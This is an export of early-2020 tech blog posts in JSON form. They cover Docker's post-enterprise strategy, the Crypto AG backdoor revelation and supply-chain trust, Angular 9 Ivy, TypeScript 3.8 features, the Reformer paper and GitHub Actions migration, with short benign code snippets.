As Kubernetes matured, this decoupling from Docker became one of its defining architectural strengths.\nFor Docker Inc., this is actually fine. Their developer tools don\u0026rsquo;t depend on being the production runtime. As long as the image format remains standard (and it will — OCI has seen to that), Docker Desktop can be the place where developers build and test images, regardless of what runs them in production. It\u0026rsquo;s a narrower niche than \u0026ldquo;the entire container platform,\u0026rdquo; but it\u0026rsquo;s a defensible one.\nWhat concerns me slightly is the growing gap between development and production environments that this creates. If you\u0026rsquo;re building images with Docker but running them with containerd, there can be subtle differences in behavior — particularly around networking, storage drivers, and security contexts. In practice these differences are rare, but they exist, and they can make debugging production issues frustrating.\nMy Take # I\u0026rsquo;ve been using Docker since the 0.x days, back when it was still based on LXC and every other build broke something. The technology was transformative — it fundamentally changed how we think about packaging and deploying software. But the business always struggled with the classic open-source dilemma: how do you capture value from a technology that everyone uses but no one wants to pay for?\nDocker\u0026rsquo;s new focus is narrower but more honest. Developer tooling is a legitimate business — JetBrains has proven that developers will pay for tools that make them productive. Docker Desktop is genuinely useful, Docker Hub is genuinely critical infrastructure, and there\u0026rsquo;s a real opportunity to build a sustainable business around them.\nThe risk is that Docker tries to boil the ocean again — expanding into CI/CD, deployment, monitoring, or other areas where they\u0026rsquo;d face entrenched competition. 
The best thing Docker can do right now is make Docker Desktop the absolute best local development experience for containers, and make Docker Hub the most reliable and secure image registry. Do those two things well, and the business will follow.\nFor the rest of us, the lesson is simpler: Docker the company may change shape, but containers aren\u0026rsquo;t going anywhere. OCI standards ensure that the ecosystem survives regardless of any single vendor\u0026rsquo;s fortunes. And that\u0026rsquo;s exactly how infrastructure technology should work. The broader infrastructure-as-code movement demonstrates how containerization fits into the larger operational picture.\nThis post is part of my Infrastructure Notes series, tracking the tools and platforms that shape how we build and deploy software.\n","date":"20 February 2020","externalUrl":null,"permalink":"/posts/200220-docker-desktop-new-direction/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Three months after selling Docker Enterprise to Mirantis, Docker Inc. is refocusing on developer experience. What does this mean for the container ecosystem?","title":"Docker's Second Act — Finding Its Place After the Enterprise Sell-Off","type":"posts"},{"content":"Two days ago, the Washington Post and German broadcaster ZDF published what might be the most significant intelligence story in years. For decades, the CIA and German BND secretly owned Crypto AG, a Swiss company that sold encryption equipment to over 120 countries. The devices were rigged — the intelligence agencies could read the encrypted communications of their customers. Governments, militaries, and diplomats around the world were paying good money for equipment that was designed to betray them. 
This echoes broader patterns we\u0026rsquo;d seen just a month earlier with the NSA\u0026rsquo;s CVE disclosure and foreshadows future incidents like the SolarWinds supply chain attack.\nThe operation, codenamed \u0026ldquo;Thesaurus\u0026rdquo; and later \u0026ldquo;Rubicon,\u0026rdquo; ran from 1970 until at least 2018. Let that sink in. Nearly fifty years of compromised encryption, sold by a \u0026ldquo;neutral\u0026rdquo; Swiss company that was actually a front for Western intelligence services.\nThe Technical Mechanics of Betrayal # The beauty — if you can call it that — of the operation was its subtlety. Crypto AG didn\u0026rsquo;t sell devices that didn\u0026rsquo;t encrypt. They sold devices that encrypted and included a hidden channel that allowed the CIA and BND to recover the plaintext. The specific techniques evolved over the decades, but the general approach involved weakening the random number generation or including covert parameters in the key exchange that only the agencies knew how to exploit.\nIn the mechanical cipher era, this meant manipulating the cipher wheels. In the electronic era, it meant embedding weaknesses in the algorithms that weren\u0026rsquo;t detectable through black-box testing. The devices appeared to work perfectly — messages were encrypted and decrypted as expected. You\u0026rsquo;d need access to the source code or detailed hardware schematics to spot the backdoor, and Crypto AG controlled both.\nThis is a masterclass in supply chain compromise, executed at a scale and duration that dwarfs anything we\u0026rsquo;ve seen in the software world. It makes the Juniper Networks backdoor discovered in 2015 look like amateur hour. 
The implications for modern software would become starkly clear just years later with the SolarWinds supply chain attack and subsequent open source ecosystem compromises.\nSupply Chain Trust Is the Fundamental Problem # For those of us building software systems, the Crypto AG story is a vivid illustration of a problem we grapple with daily: how do you trust your supply chain? Every application we build stands on a tower of dependencies — operating systems, compilers, libraries, hardware, and cloud services — that we largely take on faith.\nKen Thompson laid this out in his 1984 Turing Award lecture, \u0026ldquo;Reflections on Trusting Trust.\u0026rdquo; He demonstrated that a compiler could be modified to insert a backdoor into any program it compiled, including future versions of itself, with no trace in the source code. Crypto AG proves that this isn\u0026rsquo;t just a theoretical exercise — it\u0026rsquo;s a strategy that intelligence agencies will pursue for decades. The White House would eventually convene policy makers to address these systemic security risks.\nIn the modern software ecosystem, we\u0026rsquo;re arguably more vulnerable than Crypto AG\u0026rsquo;s customers were. Consider:\nnpm, PyPI, and other package registries host hundreds of thousands of packages, many maintained by anonymous individuals Cloud providers manage the hardware and hypervisors our code runs on CI/CD pipelines execute arbitrary code with access to our secrets Hardware manufacturers control the firmware and microcode in our processors We perform audits, we review code, we use reproducible builds where we can. But the honest truth is that the complexity of modern systems makes comprehensive verification effectively impossible.\nThe Open Source Angle # One argument you\u0026rsquo;ll hear is that open source solves this problem — with enough eyes, all bugs are shallow, and backdoors can\u0026rsquo;t hide in public code. There\u0026rsquo;s some truth to this. 
An open-source encryption library is harder to backdoor than a proprietary black-box device. But \u0026ldquo;harder\u0026rdquo; isn\u0026rsquo;t \u0026ldquo;impossible.\u0026rdquo;\nThe OpenSSL Heartbleed vulnerability persisted for two years in one of the most widely-used open source projects in the world. It wasn\u0026rsquo;t a deliberate backdoor (as far as we know), but it demonstrated that critical code can go unreviewed for extended periods. The Debian OpenSSL fiasco of 2008, where a well-meaning maintainer accidentally crippled the random number generator, showed how easy it is to introduce cryptographic weaknesses without malice.\nIf we can\u0026rsquo;t reliably catch accidental cryptographic weaknesses in open source code, catching deliberate, cleverly-designed ones is even harder. The Crypto AG engineers who implemented the backdoors were skilled cryptographers who understood exactly how to introduce weaknesses that would survive casual review.\nWhat This Means for Security Architecture # The practical takeaway isn\u0026rsquo;t to throw up your hands and declare all encryption compromised. It\u0026rsquo;s to design systems with the assumption that any single component might be compromised. Defense in depth isn\u0026rsquo;t just a buzzword — it\u0026rsquo;s the only rational response to a world where your encryption vendor might be owned by an intelligence agency.\nSpecifically:\nLayer your encryption. Don\u0026rsquo;t rely on a single encryption implementation. TLS for transport plus application-layer encryption using a different library gives you resilience against compromise of either one. Diversify your trust. Use components from different vendors, different countries, different development teams. A backdoor in one is less useful if it\u0026rsquo;s wrapped in another layer the adversary can\u0026rsquo;t break. Verify where you can. 
Reproducible builds, binary verification, and periodic audits of critical dependencies aren\u0026rsquo;t paranoia — they\u0026rsquo;re hygiene. Assume breach. Design your systems so that compromise of any single component limits the blast radius. Segment networks, rotate keys, minimize data retention. My Take # I\u0026rsquo;ve been in this industry long enough to not be shocked by intelligence agencies doing intelligence agency things. What strikes me about the Crypto AG story isn\u0026rsquo;t the betrayal itself — it\u0026rsquo;s the duration and scale. Fifty years. Over a hundred countries. And it only came to light because journalists did the digging.\nAs software engineers, we\u0026rsquo;re building the infrastructure that societies depend on. The Crypto AG revelation should make us deeply uncomfortable about the trust assumptions baked into our systems. Not because we should suspect every dependency of being a CIA front, but because it proves that sustained, sophisticated supply chain compromises are not theoretical.\nThe next time someone tells you that your threat model is too paranoid, point them to Crypto AG. A Swiss company that sold encryption to governments for half a century, and it was all a lie. Sometimes paranoia is just good engineering.\nThis post is part of my ongoing series examining security in practice — real incidents with real lessons for working engineers.\n","date":"13 February 2020","externalUrl":null,"permalink":"/posts/200213-cia-crypto-ag-backdoor/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Washington Post reveals the CIA secretly owned Crypto AG for decades, selling compromised encryption to governments worldwide. The supply chain trust implications are staggering.","title":"The Crypto AG Revelation — When Your Encryption Vendor Is the Intelligence Agency","type":"posts"},{"content":"Angular 9 shipped today, and with it, the Ivy rendering engine is finally the default. 
If you\u0026rsquo;ve been following the Angular project for the past couple of years, you know this has been a long time coming. The team first previewed Ivy at ng-conf 2018, and after a cautious opt-in period during Angular 8, it\u0026rsquo;s now front and center. For those of us who\u0026rsquo;ve watched framework rewrites go sideways more than once, this is a noteworthy moment — not because it\u0026rsquo;s revolutionary, but because it actually landed. This aligns with the broader language evolution we\u0026rsquo;d seen in TypeScript 3.8 with improved type safety features for application code.\nWhat Ivy Actually Changes # At its core, Ivy is a complete rewrite of Angular\u0026rsquo;s rendering pipeline — the compiler and runtime that turns your templates into executable code. The previous engine, View Engine, worked fine but produced larger bundles and was harder to tree-shake effectively. Ivy addresses this by generating code that\u0026rsquo;s more amenable to dead code elimination.\nThe practical results are encouraging. Early adopters during the Angular 8 opt-in period reported meaningful reductions in bundle size, particularly for smaller applications. The Angular team\u0026rsquo;s own benchmarks show bundle sizes dropping by around 25-40% for modest apps. For large enterprise applications — which is where Angular lives and breathes — the gains are more incremental, but still welcome.\nCompilation speed is the other headline improvement. Ivy\u0026rsquo;s locality principle means that each component can be compiled independently, without needing to analyze the entire application. This translates to faster rebuilds during development, which is something every developer appreciates. The --aot flag is now the default for ng serve, which means you catch template errors during development rather than at build time. 
That alone is worth the upgrade.\nThe Template Type-Checking Story # One of the less flashy but more impactful changes is improved template type-checking. Angular has always had an advantage over React in that templates are structured and analyzable, but the type-checking was historically a bit loose. With Ivy, the strictTemplates option in tsconfig.json enables much more thorough checking of template expressions.\nI\u0026rsquo;ve been experimenting with this in a side project, and it catches real bugs — mistyped property names, incorrect event bindings, type mismatches in pipes. If you\u0026rsquo;re already using TypeScript for its type safety (and you should be), having that safety extend into your templates is a natural evolution. It\u0026rsquo;s not quite at the level of what Elm gives you, but it\u0026rsquo;s a significant step for a mainstream framework.\n// tsconfig.json { \u0026#34;angularCompilerOptions\u0026#34;: { \u0026#34;strictTemplates\u0026#34;: true, \u0026#34;strictInjectionParameters\u0026#34;: true, \u0026#34;strictInputAccessModifiers\u0026#34;: true } } I\u0026rsquo;d recommend enabling these flags on any new project immediately. For existing projects, you can enable them incrementally — the compiler will tell you exactly what needs fixing.\nUpgrade Path and Migration # The Angular team deserves credit for their upgrade tooling. Running ng update @angular/core @angular/cli handles most of the migration automatically, including updating RxJS imports to use the tree-shakeable format and adjusting for deprecated APIs. I ran it on a medium-sized project (about 150 components) and the automatic migration handled roughly 90% of the changes. This level of tooling maturity reflects how frameworks have learned from earlier transitions, much like the TypeScript evolution showed a commitment to manageable upgrades.\nThe remaining 10% were mostly edge cases around ViewChild and ContentChild queries and their static flag. Angular 8 required the flag on every query; in Angular 9 it defaults to false, so it only has to be spelled out when a query must resolve before change detection runs. 
It\u0026rsquo;s a minor inconvenience that makes the behavior more predictable:\n// Before: timing was implicit and confusing @ViewChild(\u0026#39;myRef\u0026#39;) myRef: ElementRef; // After: you declare when you need the reference @ViewChild(\u0026#39;myRef\u0026#39;, { static: true }) myRef: ElementRef; // Available in ngOnInit @ViewChild(\u0026#39;myRef\u0026#39;, { static: false }) myRef: ElementRef; // Available in ngAfterViewInit This is the kind of breaking change I can get behind — it makes implicit behavior explicit, reducing a whole category of timing-related bugs.\nThe Broader Framework Landscape # Angular 9 arrives at an interesting moment. React continues to dominate mindshare, Vue 3 is in development with its own Composition API, and Svelte is generating excitement with its compiler-first approach. Angular\u0026rsquo;s position has always been as the \u0026ldquo;enterprise choice\u0026rdquo; — opinionated, batteries-included, TypeScript-first.\nWith Ivy, Angular doesn\u0026rsquo;t suddenly become hip or trendy, and that\u0026rsquo;s fine. What it does is become more competitive on the metrics that matter: bundle size, compilation speed, and developer experience. The framework still has a steeper learning curve than React or Vue, and the module system remains more ceremony than I\u0026rsquo;d like. But for teams building large, long-lived applications with complex forms and routing, Angular\u0026rsquo;s structure is a feature, not a bug.\nMy Take # I\u0026rsquo;ve been building web applications since before jQuery was a thing, and if there\u0026rsquo;s one pattern I\u0026rsquo;ve seen repeatedly, it\u0026rsquo;s that the best framework rewrites are the boring ones. The ones that improve things incrementally while maintaining backward compatibility. Ivy is exactly that — no flashy new syntax, no paradigm shifts, just a better engine under the hood.\nThe real test will be how the ecosystem adapts. 
Libraries need to be compiled with Ivy-compatible versions, and while the Angular team has provided a compatibility compiler (ngcc) to bridge the gap, it adds overhead to node_modules processing. I expect this transitional pain to last about six months before most maintained libraries ship Ivy-native builds.\nIf you\u0026rsquo;re on Angular 8, upgrade. If you\u0026rsquo;re on Angular 7 or earlier, plan your upgrade path — the tooling makes it smoother than you\u0026rsquo;d expect. And if you\u0026rsquo;re not using Angular at all, this release alone probably won\u0026rsquo;t change your mind. But it should reassure anyone who bet on Angular that the framework is in good hands.\nThis post is part of my weekly series covering the developer landscape as it evolves throughout 2020.\n","date":"6 February 2020","externalUrl":null,"permalink":"/posts/200206-angular-9-ivy-compiler/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Angular 9 arrives with the Ivy compiler as default, delivering on years of promises about smaller bundles and faster compilation.","title":"Angular 9 Lands with Ivy — The Rewrite That Actually Shipped","type":"posts"},{"content":"The TypeScript team announced the 3.8 beta this week, and it\u0026rsquo;s a release that I think deserves more attention than the version number suggests. While it doesn\u0026rsquo;t have the headline-grabbing appeal of optional chaining (that was 3.7), the features in 3.8 signal important shifts in both TypeScript and the broader JavaScript ecosystem. These language improvements were arriving just as frameworks like Angular 9 with its Ivy compiler were focusing on their own modernization efforts.\nThe two headliners: ECMAScript private fields and top-level await. Both are features that change how you structure code in meaningful ways.\nECMAScript Private Fields — Finally, Real Privacy # TypeScript has had the private keyword since day one. 
But here\u0026rsquo;s the thing that catches people off guard: TypeScript\u0026rsquo;s private is a compile-time-only concept. At runtime, the property is completely accessible. It\u0026rsquo;s a gentlemen\u0026rsquo;s agreement enforced by the type checker, not by the JavaScript engine.\nECMAScript private fields, using the # prefix syntax, are different. They\u0026rsquo;re truly private at runtime:\nclass Person { #name: string; constructor(name: string) { this.#name = name; } greet() { console.log(`Hello, I\u0026#39;m ${this.#name}`); } } const p = new Person(\u0026#34;Osmond\u0026#34;); p.#name; // Error! Property \u0026#39;#name\u0026#39; is not accessible // outside class \u0026#39;Person\u0026#39; because it has a // private identifier. The #name field literally doesn\u0026rsquo;t exist from outside the class. You can\u0026rsquo;t access it with bracket notation, you can\u0026rsquo;t find it with Object.keys(), and you can\u0026rsquo;t reach it through the prototype chain. This is enforcement by the JavaScript engine, not the type checker.\nNow, I can already hear the pragmatists asking: \u0026ldquo;Why do I need this when TypeScript\u0026rsquo;s private keyword works fine?\u0026rdquo; Fair question. Here\u0026rsquo;s why it matters:\nLibrary authors: If you publish a library, your private members are accessible to consumers who use JavaScript directly (or who use // @ts-ignore). True private fields mean your internal implementation details are genuinely hidden.\nSecurity-sensitive code: In scenarios where you\u0026rsquo;re handling credentials, tokens, or sensitive state, compile-time privacy isn\u0026rsquo;t sufficient. # fields prevent any runtime inspection. This is especially important as frameworks implement more sophisticated state management.\nFuture-proofing: This is the direction ECMAScript is going. The class fields proposal is at Stage 3, which means it\u0026rsquo;s essentially locked in for JavaScript. 
TypeScript is aligning with the language it compiles to.\nThat said, there are practical concerns. The # syntax is polarizing — it looks foreign to developers coming from Java, C#, or even TypeScript\u0026rsquo;s own private keyword. There will be a period where codebases have a mix of private and # fields, which could be confusing.\nMy recommendation: for new code in libraries that are consumed externally, prefer # fields. For application code where everything goes through the TypeScript compiler, private is still perfectly fine.\nTop-Level Await — A Bigger Deal Than It Looks # The second major feature is support for top-level await. Currently, you can only use await inside an async function:\n// Before: awkward IIFE wrapper (async () =\u0026gt; { const data = await fetch(\u0026#34;/api/config\u0026#34;); const config = await data.json(); // use config... })(); With top-level await, you can write this at the module level:\n// After: clean and direct const data = await fetch(\u0026#34;/api/config\u0026#34;); const config = await data.json(); export { config }; This is particularly valuable for:\nModule initialization: Modules that need to load configuration, establish database connections, or perform other async setup can now do so cleanly. Scripts and tooling: CLI tools and scripts that are essentially one big async operation no longer need the IIFE dance. Dynamic imports: You can await import(\u0026quot;./module\u0026quot;) at the top level, enabling conditional module loading patterns. The catch — and it\u0026rsquo;s an important one — is that top-level await only works in ES modules, not CommonJS. TypeScript enforces this by requiring \u0026quot;module\u0026quot;: \u0026quot;esnext\u0026quot; or \u0026quot;module\u0026quot;: \u0026quot;system\u0026quot;, along with a \u0026quot;target\u0026quot; of es2017 or later, in your tsconfig.json. 
If you\u0026rsquo;re still shipping CommonJS (which many Node.js projects are), you\u0026rsquo;ll need to evaluate whether the module system switch is worth it.\nThere\u0026rsquo;s also a subtlety around execution order. When module A uses top-level await, any module that imports from A will wait for that await to resolve before executing. This creates implicit asynchronous dependencies in your module graph, which can affect startup performance if you\u0026rsquo;re not careful.\nExport * As Namespace # The third feature is less dramatic but solves a real annoyance:\nexport * as utilities from \u0026#34;./utilities\u0026#34;; This re-exports everything from ./utilities as a namespace object. Previously, you had to do this in two steps:\nimport * as utilities from \u0026#34;./utilities\u0026#34;; export { utilities }; It\u0026rsquo;s a small quality-of-life improvement that makes barrel files (index.ts re-export modules) cleaner. If you maintain libraries with complex module structures, you\u0026rsquo;ll appreciate this.\nType-Only Imports and Exports # Perhaps the most practically useful feature for day-to-day development is the new import type syntax:\nimport type { SomeType } from \u0026#34;./module\u0026#34;; This explicitly marks an import as type-only, meaning it will be completely erased during compilation. No runtime import, no side effects, no bundle size impact.\nThis solves a genuine problem. With regular imports, TypeScript has to figure out whether you\u0026rsquo;re using the import as a value (which needs to stay in the emitted JavaScript) or only as a type (which can be erased). In most cases it gets this right, but there are edge cases — particularly with re-exports and isolatedModules mode — where the ambiguity causes issues.\nWith import type, the intent is explicit. 
I expect this to become a best practice, especially in projects using bundlers where tree-shaking depends on clean import analysis.\nThe Bigger Picture # What I find interesting about TypeScript 3.8 is how much of it is about alignment with ECMAScript proposals. Private fields, top-level await, and export * as namespace are all TC39 proposals that TypeScript is implementing. This is TypeScript doing what it does best: giving you early access to future JavaScript features with type safety bolted on.\nThe pace of TypeScript releases continues to be impressive. We\u0026rsquo;ve gotten optional chaining, nullish coalescing, and now private fields and top-level await — all within a few months. The TypeScript team\u0026rsquo;s ability to ship meaningful features on a regular cadence while maintaining backward compatibility is, frankly, the gold standard for language evolution. The Python 2/3 situation this language is not.\nMy Take # TypeScript 3.8 is a solid, pragmatic release. The features aren\u0026rsquo;t revolutionary on their own, but they collectively make TypeScript a more complete and more aligned superset of JavaScript.\nIf I had to pick one feature to adopt immediately, it would be import type. It costs nothing, makes your intent explicit, and prevents a class of subtle bundling issues. Private fields with # are great for library authors but can wait for broader ecosystem adoption. Top-level await is powerful but requires careful thought about your module system.\nThe TypeScript team continues to be one of the best examples of language stewardship in the industry. They ship often, break almost nothing, and consistently make developers\u0026rsquo; lives better. 
That\u0026rsquo;s not a bad way to start the decade.\n","date":"30 January 2020","externalUrl":null,"permalink":"/posts/200130-typescript-3-8-private-fields-top-level-await/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"TypeScript 3.8 beta brings ECMAScript private fields, top-level await, and export * as syntax. These features signal where JavaScript itself is heading.","title":"TypeScript 3.8 Beta — Private Fields and Top-Level Await Land","type":"posts"},{"content":"Google Research published a paper this week that caught my attention: Reformer: The Efficient Transformer. In a field that\u0026rsquo;s been racing toward ever-larger models — GPT-2\u0026rsquo;s 1.5 billion parameters, Megatron-LM\u0026rsquo;s 8.3 billion — this paper asks a different question: can we make Transformers dramatically more efficient without sacrificing quality?\nAs someone who\u0026rsquo;s been trying to integrate ML models into production systems that don\u0026rsquo;t have Google\u0026rsquo;s budget, this is the kind of research I\u0026rsquo;ve been waiting for.\nThe Problem With Current Transformers # The Transformer architecture, introduced in the landmark \u0026ldquo;Attention Is All You Need\u0026rdquo; paper in 2017, has become the dominant architecture for natural language processing. BERT, GPT-2, XLNet — they\u0026rsquo;re all Transformers under the hood.\nBut there\u0026rsquo;s a dirty secret: Transformers are absurdly expensive to run. The self-attention mechanism that makes them so powerful has O(N²) complexity with respect to sequence length. Double the input length, and you quadruple the compute and memory requirements.\nIn practice, this means:\nBERT is limited to 512 tokens (roughly a page of text). Want to process a full document? You have to chunk it. GPT-2 Large needs multiple GPUs just for inference. Fine-tuning it requires hardware that costs thousands per month. 
Processing long sequences — full articles, codebases, conversation histories — is either impossible or requires ugly workarounds like sliding windows. For those of us building practical applications, these constraints are real barriers. I\u0026rsquo;ve been working on a document analysis feature where the 512-token limit means we lose context across sections. It works, but it\u0026rsquo;s a compromise.\nWhat Reformer Changes # The Reformer paper introduces two key innovations that together reduce the memory and compute requirements dramatically:\nLocality-Sensitive Hashing (LSH) Attention # Standard self-attention computes attention weights between every pair of tokens. For a sequence of length N, that\u0026rsquo;s N² attention computations. Reformer replaces this with locality-sensitive hashing, which groups similar tokens into buckets and only computes attention within those buckets.\nThe intuition is straightforward: in practice, most attention weights are very small. Only a few tokens actually attend strongly to each other. LSH is a way to approximately find those important pairs without checking every combination. This reduces the attention complexity from O(N²) to O(N log N).\nThe trade-off is that it\u0026rsquo;s an approximation. You might miss some attention connections that standard Transformers would catch. The paper shows this doesn\u0026rsquo;t significantly hurt quality on the benchmarks they tested, but it\u0026rsquo;s something to watch as people push the boundaries.\nReversible Residual Layers # The second innovation tackles memory. In a standard Transformer, you need to store the activations from every layer during training for the backward pass. For a model with many layers and long sequences, this eats enormous amounts of GPU memory.\nReformer uses reversible residual connections (from a 2017 paper by Gomez et al.) that allow you to recompute activations during the backward pass instead of storing them. 
You trade compute for memory — the backward pass is slower, but you need far less GPU RAM.\nThe combined effect is striking. The paper demonstrates processing sequences of 64,000 tokens on a single GPU. For context, that\u0026rsquo;s 125x longer than BERT\u0026rsquo;s 512-token limit. On a single GPU.\nWhy This Matters for Practitioners # I think there are two groups who should pay attention to Reformer:\nApplication developers who want to use Transformers for tasks involving long documents, code analysis, or conversation systems. The sequence length limitation has been the single biggest practical constraint. If Reformer-style models become available in frameworks like Hugging Face\u0026rsquo;s transformers library (which I expect will happen within months), it opens up use cases that were previously impractical.\nTeams with limited compute budgets — which is most of us. The trend of ever-larger models has been creating a divide between organizations that can afford massive GPU clusters and everyone else. Efficiency research like Reformer is the counterweight. If you can get 90% of the quality at 10% of the cost, that\u0026rsquo;s a viable trade-off for most production systems.\nThe paper also has implications for code understanding. Source code files are often much longer than 512 tokens, and understanding code requires long-range dependencies (a function defined at line 50 might be called at line 500). Current Transformer-based code models are severely limited by sequence length. Reformer\u0026rsquo;s ability to handle 64K tokens could unlock significantly better code analysis tools.\nWhat\u0026rsquo;s Still Missing # Let me temper the enthusiasm with some practical concerns:\nNo pre-trained models yet: The paper presents the architecture and benchmarks, but there\u0026rsquo;s no \u0026ldquo;Reformer-Base\u0026rdquo; that you can download and fine-tune today. Training these models from scratch still requires significant resources. 
Approximation trade-offs: The LSH attention is approximate. For tasks where precise long-range attention patterns are critical, the quality gap might be larger than the paper\u0026rsquo;s benchmarks suggest. Engineering complexity: Implementing LSH attention and reversible layers correctly is non-trivial. Until this is well-supported in major frameworks (PyTorch, TensorFlow), adoption will be limited to research teams. Inference vs. training: The reversible layers mainly help with training memory. Inference benefits come primarily from the LSH attention. For serving models in production, the speedup may be more modest than the training improvements suggest. My Take # The AI field has been in a \u0026ldquo;bigger is better\u0026rdquo; arms race for the past two years. More parameters, more data, more GPUs. The results have been impressive — GPT-2\u0026rsquo;s text generation and BERT\u0026rsquo;s NLU capabilities are genuinely remarkable. But this trajectory is unsustainable and exclusionary.\nResearch like Reformer represents the other path: making powerful architectures accessible. I\u0026rsquo;d argue this direction is ultimately more impactful for the industry. A model that runs on a single GPU and handles long sequences opens doors for thousands of teams. A model that requires a 256-GPU cluster is a demo for a conference talk.\nI\u0026rsquo;ll be watching for when Reformer-style attention makes it into the Hugging Face ecosystem. That\u0026rsquo;s when the real experimentation begins — not when the paper is published, but when practitioners can pip install it and start building. For now, the paper is worth reading if you work with NLP or are interested in where Transformer architectures are heading. 
The math isn\u0026rsquo;t trivial, but the key ideas — hash-based approximate attention and reversible computation — are elegant and intuitive.\nThe race to make AI practical is just as important as the race to make it powerful.\n","date":"23 January 2020","externalUrl":null,"permalink":"/posts/200123-reformer-efficient-transformers/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google’s new Reformer model tackles the massive memory and compute costs of Transformers. For engineers building AI-powered features, this matters more than another benchmark score.","title":"Reformer — Can We Make Transformers Practical for the Rest of Us?","type":"posts"},{"content":"It\u0026rsquo;s been about two months since GitHub Actions went generally available in November 2019, and the dust is starting to settle. I\u0026rsquo;ve been migrating several projects from Travis CI and CircleCI over the holiday break, and I want to share what I\u0026rsquo;m seeing — because I think the CI/CD landscape is about to shift in a way we haven\u0026rsquo;t seen since Jenkins went mainstream. As we\u0026rsquo;ve seen with infrastructure-as-code platforms, tooling integration and automation are becoming foundational to modern development practices.\nThe Marketplace Effect # The most underappreciated aspect of GitHub Actions isn\u0026rsquo;t the YAML syntax or the runner infrastructure — it\u0026rsquo;s the marketplace. The GitHub Marketplace for Actions already has thousands of pre-built actions, and the number is growing rapidly.\nThis is the network effect at work. When your CI/CD system lives in the same platform as your code, your issues, your pull requests, and your package registry, the friction for creating and sharing automation drops to nearly zero. Want to add Slack notifications? There\u0026rsquo;s an action for that. Need to deploy to AWS? Dozens of options. Want to auto-label PRs based on file paths? 
Five minutes of YAML.\nCompare this to writing a Jenkins plugin (Java, XML configuration, release process) or even a CircleCI orb (still requires its own repo, versioning, and publication). GitHub Actions reduced the barrier to \u0026ldquo;put an action.yml in a repo and push.\u0026rdquo; The result is an explosion of community-contributed automation.\nIn my experience over the last two months, I\u0026rsquo;d say about 70% of what I need is already available as a published action. The remaining 30% is custom logic that I can write as a simple shell script right in the workflow file.\nWhat Migration Actually Looks Like # I\u0026rsquo;ve been moving Node.js and Python projects, and here\u0026rsquo;s the honest assessment:\nWhat\u0026rsquo;s great:\nThe integration with pull requests is seamless. Status checks, annotations on specific lines of code, automatic check runs — it all just works because it\u0026rsquo;s native to the platform. Matrix builds are well-designed. Testing across Node 10/12/14 and Ubuntu/macOS/Windows is a clean, declarative matrix in YAML. The free tier is generous for open source: unlimited minutes on public repos. For private repos, you get 2,000 minutes/month on the free plan. Secrets management is straightforward. Repository and organization secrets integrate cleanly. What\u0026rsquo;s rough:\nDebugging failed workflows is painful. You can\u0026rsquo;t SSH into a runner to inspect state (unlike CircleCI). You\u0026rsquo;re reading log output and re-pushing commits to trigger reruns. There are community actions that set up tmate sessions, but it\u0026rsquo;s a workaround. Caching is better than it was in beta but still not as intelligent as some competitors. The actions/cache action requires you to explicitly define cache keys and paths. YAML verbosity is real. Complex workflows with multiple jobs, conditions, and matrix strategies can become walls of YAML that are hard to review. The documentation, while improving, has gaps. 
I\u0026rsquo;ve found myself reading the source code of official actions to understand edge cases. The Travis CI Question # Let\u0026rsquo;s address the elephant in the room. Travis CI has been the default CI for open-source projects hosted on GitHub for the better part of a decade. That .travis.yml file has been a standard fixture in open-source repos.\nWith GitHub Actions offering unlimited free CI for public repos, with deeper GitHub integration, and without the pricing concerns that have dogged Travis CI since its acquisition by Idera in 2019 — the writing seems to be on the wall. This mirrors broader ecosystem consolidation patterns we\u0026rsquo;ve seen in open source, where platform decisions have profound impacts on communities.\nI\u0026rsquo;ve already noticed a trend in the open-source projects I follow: new projects almost universally choose GitHub Actions. Established projects are starting to add GitHub Actions workflows alongside their existing Travis configs, often with plans to deprecate the latter.\nThis isn\u0026rsquo;t necessarily a good thing. Monoculture in developer tooling carries risks. When GitHub had its outages in the past, it already took out code hosting, issue tracking, and package management. Adding CI/CD to that single point of failure is worth thinking about. The supply chain security implications of consolidated tooling are increasingly important as our infrastructure becomes more interconnected.\nThe Real Competition: GitLab CI # While Travis and CircleCI face the most immediate pressure, I think the more interesting competitive dynamic is between GitHub Actions and GitLab CI/CD.\nGitLab has had integrated CI/CD for years, and it\u0026rsquo;s genuinely excellent. Their pipeline syntax is mature, their runner infrastructure (including self-hosted runners) is battle-tested, and their Auto DevOps feature offers zero-config CI/CD for common project types.\nWhat GitHub Actions has is distribution. 
GitHub hosts the overwhelming majority of open-source projects and a massive share of private repositories. GitLab\u0026rsquo;s CI is arguably more mature, but GitHub\u0026rsquo;s reach means Actions will likely see faster ecosystem growth.\nFor teams already on GitLab, I see no compelling reason to switch. GitLab CI is more feature-complete today. But for the millions of projects on GitHub that were using third-party CI, the gravitational pull of an integrated solution is strong.\nWorkflow Patterns I\u0026rsquo;ve Found Useful # After migrating several repos, here are patterns that have worked well:\nReusable workflow fragments: Keep common steps in composite actions within your organization. We have a shared action for our standard Node.js build-test-lint sequence that every repo references.\nPath-filtered triggers: Use on.push.paths and on.pull_request.paths to avoid running expensive test suites when only documentation changes. This saves minutes and keeps feedback loops fast.\nConditional deployments: The if conditionals on jobs work well for deploy-on-tag patterns:\ndeploy: if: startsWith(github.ref, \u0026#39;refs/tags/v\u0026#39;) needs: [test, lint] Dependabot + auto-merge: GitHub\u0026rsquo;s Dependabot creates PRs for dependency updates, and you can write an Actions workflow that auto-merges them when CI passes and the update is a patch version. This has dramatically reduced my dependency maintenance overhead.\nMy Take # GitHub Actions is good enough today for most CI/CD workloads, and it\u0026rsquo;s going to get better fast. The marketplace ecosystem is its biggest advantage — it lowers the effort floor for CI/CD in a way that benefits everyone, especially smaller teams and open-source maintainers who don\u0026rsquo;t want to maintain complex pipeline configurations.\nThat said, I\u0026rsquo;d caution against migrating critical production deployment pipelines just yet. For build-and-test workflows on open source, it\u0026rsquo;s a no-brainer. 
